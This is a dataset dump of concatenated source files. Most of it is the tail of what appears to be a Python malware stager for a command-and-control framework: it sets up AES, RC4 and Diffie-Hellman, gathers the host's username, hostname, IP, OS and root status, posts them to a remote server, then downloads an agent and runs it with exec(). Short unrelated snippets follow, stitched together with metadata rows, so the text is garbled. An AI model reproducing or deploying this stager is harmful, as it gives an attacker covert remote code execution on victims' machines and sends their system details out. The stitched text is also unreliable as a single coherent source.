0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46]
U4 = [0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d]
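    # Note: T2-T4 are byte-wise rotations of T1 (and T6-T8 of T5), precomputed so
    # each round reduces to table lookups and XORs; the U tables apply the
    # InvMixColumns step used to derive decryption round keys (fips-197, 5.3.5).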
def __init__(self, key):
if len(key) not in (16, 24, 32):
raise ValueError('Invalid key size')
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
# Key expansion (fips-197 section 5.2)
rconpointer = 0
t = KC
while t < round_key_count:
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
j = 0
while j < KC and t < round_key_count:
self._Ke[t // 4][t % 4] = tk[j]
self._Kd[rounds - (t // 4)][t % 4] = tk[j]
j += 1
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
if len(plaintext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Ke) - 1
(s1, s2, s3) = [1, 2, 3]
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T4[ t[(i + s3) % 4] & 0xFF] ^
self._Ke[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.S[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
def decrypt(self, ciphertext):
'Decrypt a block of cipher text using the AES block cipher.'
if len(ciphertext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Kd) - 1
(s1, s2, s3) = [3, 2, 1]
a = [0, 0, 0, 0]
# Convert ciphertext to (ints ^ key)
t = [(_compact_word(ciphertext[4 * i:4 * i + 4]) ^ self._Kd[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T5[(t[ i ] >> 24) & 0xFF] ^
self.T6[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T7[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T8[ t[(i + s3) % 4] & 0xFF] ^
self._Kd[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Kd[rounds][i]
result.append((self.Si[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.Si[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.Si[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
result.append((self.Si[ t[(i + s3) % 4] & 0xFF] ^ tt ) & 0xFF)
return result
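# A minimal, hedged usage sketch for the raw block cipher (defined but never
# called by this script; the key and plaintext values are illustrative). It
# assumes _string_to_bytes(), defined earlier in this file, yields a 16-entry
# list of byte values.
def _demo_aes_block_roundtrip():
    aes = AES('sixteen byte key')
    block = _string_to_bytes('a single block!!')
    # encrypt()/decrypt() operate on 16-byte blocks expressed as int lists
    assert aes.decrypt(aes.encrypt(block)) == block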
class AESBlockModeOfOperation(object):
'''Super-class for AES modes of operation that require blocks.'''
def __init__(self, key):
self._aes = AES(key)
    def decrypt(self, ciphertext):
        raise NotImplementedError('decrypt() must be implemented by a subclass')
    def encrypt(self, plaintext):
        raise NotImplementedError('encrypt() must be implemented by a subclass')
class AESModeOfOperationCBC(AESBlockModeOfOperation):
name = "Cipher-Block Chaining (CBC)"
def __init__(self, key, iv=None):
if iv is None:
self._last_cipherblock = [0] * 16
elif len(iv) != 16:
raise ValueError('initialization vector must be 16 bytes')
else:
self._last_cipherblock = _string_to_bytes(iv)
AESBlockModeOfOperation.__init__(self, key)
def encrypt(self, plaintext):
if len(plaintext) != 16:
raise ValueError('plaintext block must be 16 bytes')
plaintext = _string_to_bytes(plaintext)
precipherblock = [(p ^ l) for (p, l) in zip(plaintext, self._last_cipherblock)]
self._last_cipherblock = self._aes.encrypt(precipherblock)
return _bytes_to_string(self._last_cipherblock)
def decrypt(self, ciphertext):
if len(ciphertext) != 16:
raise ValueError('ciphertext block must be 16 bytes')
cipherblock = _string_to_bytes(ciphertext)
plaintext = [(p ^ l) for (p, l) in zip(self._aes.decrypt(cipherblock), self._last_cipherblock)]
self._last_cipherblock = cipherblock
return _bytes_to_string(plaintext)
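# Hedged sketch of the CBC mode class (illustrative values, never invoked by
# this script): a single 16-byte block round-trips when the decrypting instance
# is constructed with the same key and IV as the encrypting one.
def _demo_cbc_block_roundtrip():
    key, iv = 'sixteen byte key', '\x00' * 16
    ct = AESModeOfOperationCBC(key, iv=iv).encrypt('exactly 16 bytes')
    assert AESModeOfOperationCBC(key, iv=iv).decrypt(ct) == 'exactly 16 bytes'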
def CBCenc(aesObj, plaintext, base64=False):
    # break the plaintext into 16-byte blocks, PKCS#7-padding the last block
blocks = [plaintext[0+i:16+i] for i in range(0, len(plaintext), 16)]
blocks[-1] = append_PKCS7_padding(blocks[-1])
ciphertext = ""
for block in blocks:
ciphertext += aesObj.encrypt(block)
return ciphertext
def CBCdec(aesObj, ciphertext, base64=False):
    # break the ciphertext into 16-byte blocks; PKCS#7 padding is stripped after decrypting the last block
blocks = [ciphertext[0+i:16+i] for i in range(0, len(ciphertext), 16)]
plaintext = ""
for x in xrange(0, len(blocks)-1):
plaintext += aesObj.decrypt(blocks[x])
plaintext += strip_PKCS7_padding(aesObj.decrypt(blocks[-1]))
return plaintext
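# Hedged sketch of the padded-CBC helpers above (illustrative key; not called
# by the stager): CBCenc pads up to a block multiple, CBCdec strips the padding.
def _demo_cbc_padding_roundtrip():
    key, iv = 'sixteen byte key', getIV()
    ct = CBCenc(AESModeOfOperationCBC(key, iv=iv), 'attack at dawn')
    assert CBCdec(AESModeOfOperationCBC(key, iv=iv), ct) == 'attack at dawn'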
def getIV(length=16):
    # note: random.randint is not a CSPRNG; os.urandom() would be preferable for IVs
    return ''.join(chr(random.randint(0, 255)) for _ in range(length))
def aes_encrypt(key, data):
"""
Generate a random IV and new AES cipher object with the given
key, and return IV + encryptedData.
"""
IV = getIV()
aes = AESModeOfOperationCBC(key, iv=IV)
return IV + CBCenc(aes, data)
def aes_encrypt_then_hmac(key, data):
"""
Encrypt the data then calculate HMAC over the ciphertext.
"""
data = aes_encrypt(key, data)
mac = hmac.new(str(key), data, hashlib.sha256).digest()
return data + mac[0:10]
def aes_decrypt(key, data):
"""
Generate an AES cipher object, pull out the IV from the data
and return the unencrypted data.
"""
IV = data[0:16]
aes = AESModeOfOperationCBC(key, iv=IV)
return CBCdec(aes, data[16:])
def verify_hmac(key, data):
"""
Verify the HMAC supplied in the data with the given key.
"""
if len(data) > 20:
mac = data[-10:]
data = data[:-10]
        expected = hmac.new(str(key), data, hashlib.sha256).digest()[0:10]
# Double HMAC to prevent timing attacks. hmac.compare_digest() is
# preferable, but only available since Python 2.7.7.
return hmac.new(str(key), expected).digest() == hmac.new(str(key), mac).digest()
else:
return False
def aes_decrypt_and_verify(key, data):
"""
Decrypt the data, but only if it has a valid MAC.
"""
if len(data) > 32 and verify_hmac(key, data):
return aes_decrypt(key, data[:-10])
raise Exception("Invalid ciphertext received.")
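# Hedged round-trip sketch for the encrypt-then-MAC helpers (illustrative key,
# never executed here): the blob layout is IV(16) | ciphertext | HMAC-SHA256[:10].
def _demo_encrypt_then_hmac_roundtrip():
    key = '0123456789ABCDEF'
    blob = aes_encrypt_then_hmac(key, 'tasking data')
    assert aes_decrypt_and_verify(key, blob) == 'tasking data'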
def rc4(key, data):
"""
Decrypt/encrypt the passed data using RC4 and the given key.
"""
    # key-scheduling algorithm (KSA)
    S, j, out = list(range(256)), 0, []
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
    # pseudo-random generation (PRGA), XORed with the data
    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)
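# RC4 is symmetric: applying it twice with the same key restores the input.
# A hedged sketch with illustrative values, never called by the stager:
def _demo_rc4_symmetry():
    assert rc4('staging key', rc4('staging key', 'routing data')) == 'routing data'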
def parse_routing_packet(stagingKey, data):
"""
Decodes the rc4 "routing packet" and parses raw agent data into:
{sessionID : (language, meta, additional, [encData]), ...}
Routing packet format:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
if data:
results = {}
offset = 0
# ensure we have at least the 20 bytes for a routing packet
if len(data) >= 20:
while True:
if len(data) - offset < 20:
break
RC4IV = data[0+offset:4+offset]
RC4data = data[4+offset:20+offset]
routingPacket = rc4(RC4IV+stagingKey, RC4data)
sessionID = routingPacket[0:8]
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
(language, meta, additional, length) = struct.unpack("=BBHL", routingPacket[8:])
                # length is unpacked as an unsigned long ('L'), so it is never negative
                encData = data[(20+offset):(20+offset+length)]
results[sessionID] = (LANGUAGE_IDS.get(language, 'NONE'), META_IDS.get(meta, 'NONE'), ADDITIONAL_IDS.get(additional, 'NONE'), encData)
                # stop once all packet data has been consumed
                remainingData = data[20+offset+length:]
                if not remainingData:
                    break
offset += 20 + length
return results
else:
            print "[*] parse_routing_packet() data length incorrect: %s" % (len(data))
return None
else:
        print "[*] parse_routing_packet() data is None"
return None
def build_routing_packet(stagingKey, sessionID, meta=0, additional=0, encData=''):
"""
Takes the specified parameters for an RC4 "routing packet" and builds/returns
an HMAC'ed RC4 "routing packet".
packet format:
Routing Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) | ...
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
"""
# binary pack all of the passed config values as unsigned numbers
# B == 1 byte unsigned char, H == 2 byte unsigned short, L == 4 byte unsigned long
data = sessionID + struct.pack("=BBHL", 2, meta, additional, len(encData))
RC4IV = os.urandom(4)
key = RC4IV + stagingKey
rc4EncData = rc4(key, data)
packet = RC4IV + rc4EncData + encData
return packet
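# Hedged sketch pairing build_routing_packet() with parse_routing_packet()
# (illustrative staging key and session ID; meta=3 marks a STAGE2 packet; the
# LANGUAGE_IDS/META_IDS/ADDITIONAL_IDS maps defined earlier are assumed):
def _demo_routing_packet_roundtrip():
    sk = '0123456789ABCDEF'
    pkt = build_routing_packet(sk, 'AAAAAAAA', meta=3, encData='payload')
    parsed = parse_routing_packet(sk, pkt)
    assert parsed['AAAAAAAA'][3] == 'payload'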
def post_message(uri, data):
global headers
return (urllib2.urlopen(urllib2.Request(uri, data, headers))).read()
def get_sysinfo(nonce='00000000'):
    # nonce | listener | domainname | username | hostname | internal_ip | os_details | high_integrity | process_name | process_id | language | language_version
__FAILED_FUNCTION = '[FAILED QUERY]'
try:
username = pwd.getpwuid(os.getuid())[0]
except Exception as e:
username = __FAILED_FUNCTION
try:
uid = os.popen('id -u').read().strip()
except Exception as e:
uid = __FAILED_FUNCTION
try:
        highIntegrity = "True" if (uid == "0") else "False"
except Exception as e:
highIntegrity = __FAILED_FUNCTION
try:
osDetails = os.uname()
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
hostname = osDetails[1]
except Exception as e:
hostname = __FAILED_FUNCTION
try:
internalIP = socket.gethostbyname(socket.gethostname())
except Exception as e:
internalIP = __FAILED_FUNCTION
try:
osDetails = ",".join(osDetails)
except Exception as e:
osDetails = __FAILED_FUNCTION
try:
processID = os.getpid()
except Exception as e:
processID = __FAILED_FUNCTION
try:
temp = sys.version_info
pyVersion = "%s.%s" % (temp[0],temp[1])
except Exception as e:
pyVersion = __FAILED_FUNCTION
language = 'python'
cmd = 'ps %s' % (os.getpid())
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
parts = out.split("\n")
ps.stdout.close()
if len(parts) > 2:
processName = " ".join(parts[1].split()[4:])
else:
processName = 'python'
return "%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s" % (nonce, server, '', username, hostname, internalIP, osDetails, highIntegrity, processName, processID, language, pyVersion)
# generate a randomized sessionID
sessionID = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in xrange(8))
# server configuration information
stagingKey = "REPLACE_STAGING_KEY"
profile = 'REPLACE_PROFILE'
WorkingHours = 'SET_WORKINGHOURS'
KillDate = 'SET_KILLDATE'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" % (sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
    try:
        # split on the first colon only, so header values may contain colons
        headerKey, headerValue = headerRaw.split(":", 1)
        if headerKey.lower() == "cookie":
            # append to an existing Cookie header, or create it if absent
            if 'Cookie' in headers:
                headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
            else:
                headers['Cookie'] = headerValue
        else:
            headers[headerKey] = headerValue
    except:
        pass
# stage 3 of negotiation -> client generates DH key, and POSTs HMAC(AESn(PUBc)) back to server
clientPub = DiffieHellman()
hmacData = aes_encrypt_then_hmac(stagingKey, str(clientPub.publicKey))
# RC4 routing packet:
# meta = STAGE1 (2)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=2, encData=hmacData)
try:
postURI = server + '/index.jsp'
# response = post_message(postURI, routingPacket+hmacData)
response = post_message(postURI, routingPacket)
except:
exit()
# decrypt the server's public key and the server nonce
packet = aes_decrypt_and_verify(stagingKey, response)
nonce = packet[0:16]
serverPub = int(packet[16:])
# calculate the shared secret
clientPub.genKey(serverPub)
key = clientPub.key
# step 5 -> client POSTs HMAC(AESs([nonce+1]|sysinfo)
postURI = server + '/index.php'
hmacData = aes_encrypt_then_hmac(clientPub.key, get_sysinfo(nonce=str(int(nonce)+1)))
# RC4 routing packet:
# sessionID = sessionID
# language = PYTHON (2)
# meta = STAGE2 (3)
# extra = 0
# length = len(length)
routingPacket = build_routing_packet(stagingKey=stagingKey, sessionID=sessionID, meta=3, encData=hmacData)
response = post_message(postURI, routingPacket)
# step 6 -> server sends HMAC(AES)
agent = aes_decrypt_and_verify(key, response)
agent = agent.replace('REPLACE_WORKINGHOURS', WorkingHours)
agent = agent.replace('REPLACE_KILLDATE', KillDate)
exec(agent)
| 83.41217 | 3,081 | 0.734419 | 6,843 | 72,652 | 7.75917 | 0.412977 | 0.000904 | 0.002147 | 0.003616 | 0.071568 | 0.059421 | 0.046783 | 0.04377 | 0.039193 | 0.035163 | 0 | 0.396735 | 0.163533 | 72,652 | 870 | 3,082 | 83.508046 | 0.476971 | 0.039063 | 0 | 0.27853 | 0 | 0.001934 | 0.015824 | 0.000527 | 0 | 1 | 0.593224 | 0 | 0 | 0 | null | null | 0.001934 | 0.030948 | null | null | 0.009671 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a26d509ef395cda8929c87d0681831d3d8b0272 | 182 | py | Python | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/n3k/image_handler.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | '''NXOS N3K: Image Handler Class'''
# Genie
from genie.libs.clean.stages.nxos.n9k.image_handler import ImageHandler as N9KImageHandler
class ImageHandler(N9KImageHandler):
pass | 26 | 90 | 0.791209 | 23 | 182 | 6.217391 | 0.695652 | 0.167832 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.115385 | 182 | 7 | 91 | 26 | 0.863354 | 0.197802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
0a32df7796aa5a70685547140b2fb5181786706c | 29 | py | Python | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 46 | 2019-11-06T22:05:56.000Z | 2022-03-30T07:02:36.000Z | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 2 | 2020-10-08T16:36:04.000Z | 2021-09-30T19:37:23.000Z | graphlearning/__init__.py | jwcalder/GraphLearningOld | 04bece45cd512cf1a3bcddb163b767ca44a746e1 | [
"MIT"
] | 15 | 2020-08-25T00:57:18.000Z | 2022-02-02T14:42:31.000Z | from .graphlearning import *
| 14.5 | 28 | 0.793103 | 3 | 29 | 7.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a81ddff283dc565e12ebf0176547c03276464c1 | 176 | py | Python | programs/pyeos/tests/python/codestore/math.py | learnforpractice/pyeos | 4f04eb982c86c1fdb413084af77c713a6fda3070 | [
"MIT"
] | 144 | 2017-10-18T16:38:51.000Z | 2022-01-09T12:43:57.000Z | programs/pyeos/tests/python/codestore/math.py | openchatproject/safeos | 2c8dbf57d186696ef6cfcbb671da9705b8f3d9f7 | [
"MIT"
] | 60 | 2017-10-11T13:07:43.000Z | 2019-03-26T04:33:27.000Z | programs/pyeos/tests/python/codestore/math.py | learnforpractice/pyeos | 4f04eb982c86c1fdb413084af77c713a6fda3070 | [
"MIT"
] | 38 | 2017-12-05T01:13:56.000Z | 2022-01-07T07:06:53.000Z | def auth(func):
def func_wrapper(*args):
print('TODO: authorization check')
return func(*args)
return func_wrapper
@auth
def add(a, b):
return a+b
| 17.6 | 42 | 0.619318 | 25 | 176 | 4.28 | 0.52 | 0.205607 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.261364 | 176 | 9 | 43 | 19.555556 | 0.823077 | 0 | 0 | 0 | 0 | 0 | 0.142045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0.125 | 0.75 | 0.125 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0a849c605d4aef02c69f467436194d1bfba06c3c | 188 | py | Python | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | null | null | null | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | 78 | 2021-09-20T11:48:08.000Z | 2021-10-21T07:10:39.000Z | sst/tests/static/comments_before_markdown.py | Adamage/tutorials | b6600c052613909dbec378fea4a69deff46004dc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Comments should work here
"""
Example first cell
"""
def hello(name):
print(f'Hello {name}!') #hello
"""
Example second cell
"""
# comments should work here
| 13.428571 | 34 | 0.664894 | 26 | 188 | 4.807692 | 0.653846 | 0.224 | 0.288 | 0.352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 0.175532 | 188 | 13 | 35 | 14.461538 | 0.8 | 0.515957 | 0 | 0 | 0 | 0 | 0.245283 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
